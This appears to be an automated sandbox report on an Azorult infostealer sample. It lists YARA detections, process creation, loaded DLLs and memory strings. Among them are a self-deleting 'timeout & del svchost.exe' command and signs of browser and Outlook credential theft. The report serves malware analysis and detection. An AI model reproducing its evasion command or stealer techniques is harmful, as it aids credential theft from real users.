            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F37B5 GetLastError,FormatMessageW,0_2_007F37B5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E10BF AdjustTokenPrivileges,CloseHandle,0_2_007E10BF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007E16C3
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007F51CD
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0080A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0080A67C
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_007F648E
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007842A2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-018EDCC9-C34A4F09
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeFile created: C:\Users\user\AppData\Local\Temp\aut31FB.tmpJump to behavior
            Source: cJX8BV8LYG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: svchost.exe, 00000001.00000003.1765945641.0000000003671000.00000004.00000020.00020000.00000000.sdmp, 65132962348398743035428.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: cJX8BV8LYG.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\cJX8BV8LYG.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: crtdll.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: cJX8BV8LYG.exeStatic file information: File size 1320960 > 1048576
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cJX8BV8LYG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: wntdll.pdb source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: wntdll.pdbUGP source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
